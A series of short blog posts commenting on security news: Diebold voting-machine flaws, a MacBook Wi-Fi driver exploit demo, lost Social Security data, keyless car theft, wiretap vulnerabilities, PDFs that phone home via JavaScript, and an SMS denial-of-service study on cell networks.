Security

Diebold’s AccuVote-TS Voting Machine

A few days ago Ed Felton announced he and his students had released a detailed security analysis of the Diebold AccuVote-TS voting machine. The executive summary and/or demonstration video is well worth a look, and the full research paper is a must-read for anyone interested in computer security.

By later that day, the president of Diebold Election Systems had issued a rebuttal. I’m a security dabbler, not an expert, but to my semi-trained eye the rebuttal looks like a bunch of smoke. I’m looking forward to hearing the Princeton authors’ response [Update 9/22: posted here], but while I’m waiting for that here’s my own take on it:

Schneier on terror

Bruce Schneier has a nice piece echoing the idea that the goal of terrorism isn’t to blow up planes and kill people, it’s terror itself.

Air of smugness

What a great quote! From a story about presenters at Black Hat demonstrating a Wi-Fi driver exploit:

The video shows Ellch and Maynor targeting a specific security flaw in the Macbook’s wireless “device driver,” the software that allows the internal wireless card to communicate with the underlying OS X operating system. While those device driver flaws are particular to the Macbook — and presently not publicly disclosed — Maynor said the two have found at least two similar flaws in device drivers for wireless cards either designed for or embedded in machines running the Windows OS. Still, the presenters said they ultimately decided to run the demo against a Mac due to what Maynor called the “Mac user base aura of smugness on security.”

Information wanting to be free

Yet another huge loss of names and Social Security numbers:

The information was prepared by the loan company in January for use by Hummingbird. The data was encrypted and password-protected, but subsequently decrypted and stored on the now-lost hardware by the Hummingbird employee, Texas Guaranteed Student Loan said.

And this, boys and girls, is perhaps the truest meaning of “information wants to be free.” Not Free as in beer, not Free as in speech, but free as in free-flowing water streaming through even the smallest of holes in a dike.

Report documents worst voting-machine security flaw yet…

An inexcusable number of security flaws have been found in Diebold voting machines the past few years, but a new report from BlackBoxVoting documents what Ari Rubin and Ed Felten at Freedom to Tinker say is the worst one yet:

A report by Harri Hursti, released today at BlackBoxVoting, describes some very serious security flaws in Diebold voting machines. These are easily the most serious voting machine flaws we have seen to date — so serious that Hursti and BlackBoxVoting decided to redact some of the details in the reports…

The attacks described in Hursti’s report would allow anyone who had physical access to a voting machine for a few minutes to install malicious software code on that machine, using simple, widely available tools. The malicious code, once installed, would control all of the functions of the voting machine, including the counting of votes.

Gone in 20 minutes…

From a short article in Left Lane News about how car thieves are using laptops to circumvent keyless-entry locks:

The expert gang suspected of stealing two of David Beckham’s BMW X5 SUVs in the last six months did so by using software programs on a laptop to wirelessly break into the car’s computer, open the doors, and start the engine…

While automakers and locksmiths are supposed to be the only groups that know where and how security information is stored in a car, the information eventually falls into the wrong hands.

This should come as a surprise to no one. What concerns me more is that such software is no doubt available not just to “expert gangs” but also the equivalent of script-kiddies who normally wouldn’t even be able to figure out how to hot-wire a ’69 Buick.

(Thanks to Regis for the link…)

Talk: Matt Blaze on “Signaling Vulnerabilities in Law-Enforcement Wiretap Systems”

For folks local to the Bay Area, Prof. Matt Blaze is speaking next week at Stanford on vulnerabilities in the systems currently being used by law enforcement for wiretapping. The talk is at 4:15PM next Wednesday, 3/8/06 at Stanford University’s HP Auditorium, Gates Computer Science Building B01.

Signaling Vulnerabilities in Law-Enforcement Wiretap Systems
Matt Blaze, University of Pennsylvania

Telephone wiretap and dialed number recording systems are used by law enforcement and national security agencies to collect investigative intelligence and legal evidence. This talk will show how many of these systems are vulnerable to simple, unilateral countermeasures that allow wiretap targets to prevent their call audio from being recorded and/or cause false or inaccurate dialed digits and call activity to be logged. The countermeasures exploit the unprotected in-band signals passed between the telephone network and the collection system and are effective against many of the wiretapping technologies currently used by US law enforcement, including at least some “CALEA” systems. Possible remedies and workarounds will be proposed, and the broader implications of the security properties of these systems will be discussed.

A recent paper, as well as audio examples of several wiretapping countermeasures, can be found at http://www.crypto.com/papers/wiretapping/.

This is joint work with Micah Sherr, Eric Cronin, and Sandy Clark.

(Thanks to Mort for the link!)

PDFs that fink

Here’s a tricky little privacy hole: Adobe PDF Reader 6.0 and later will automatically (and silently) execute Javascript that’s been embedded in a PDF file, and LWN reports that a company called Remote Approach uses this “feature” to tag a PDF so it’ll phone home to their servers whenever it’s opened. Their customers can then go to a special webpage to track when the PDF was opened and at what IP address.

I’m sure you can think of your own scenarios where this would be a Bad Thing™, but the case that brought it to my attention was from a supposedly-anonymous reviewer of an academic paper who discovered Remote’s website in his firewall logs.

The simple moral of the story is that content formats should not be able to run arbitrary code, but the more general point is one of setting limits and expectations. End-users need to be able to limit what’s run on their own computers, and when the actual limits are broader than what a naive user might expect (such as when their supposedly-static PDF document can actually access the network) it’s extra important for the system to alert the user what’s happening and get permission first.

To their credit, Adobe seems to have heeded the moral: the current version of Acrobat Reader (at least on the Mac) gives a pop-up warning saying the PDF is trying to access a remote URL, and allows you to save your security settings on a site-by-site basis. I don’t know when they added this alert or whether it was in response to problems like those I mentioned, but regardless it’s nice to see the feature.

(Thanks to Dirk for the link.)

Potential DOS attack on cell networks

Researchers at Pennsylvania State University have determined that it’s possible to launch an effective denial of service attack on cellphone networks, either in a localized area or nationwide, by flooding known cellphones in the area with SMS messages (see summary, paper and NYTimes article). The attack relies on using web and Internet-based SMS portals to overwhelm the wireless data-band, which is also used for connecting voice calls. Since only messages that are actually delivered over-the-air contribute to the network congestion, attackers would first need to generating a “hit-list” of known-valid cellphones (for example, by scraping websites for cellphone numbers in a given prefix and then slowly testing those for SMS capability before starting the attack).

One snippit from the paper I found interesting was how different cellphone providers deal with a backup of SMS messages awaiting delivery to a single user (e.g. when the cellphone is turned off): AT&T buffered all 400 test SMS messages, Verizon only kept the last 100 messages sent (FIFO eviction), and Sprint only kept the first 30 (LIFO eviction).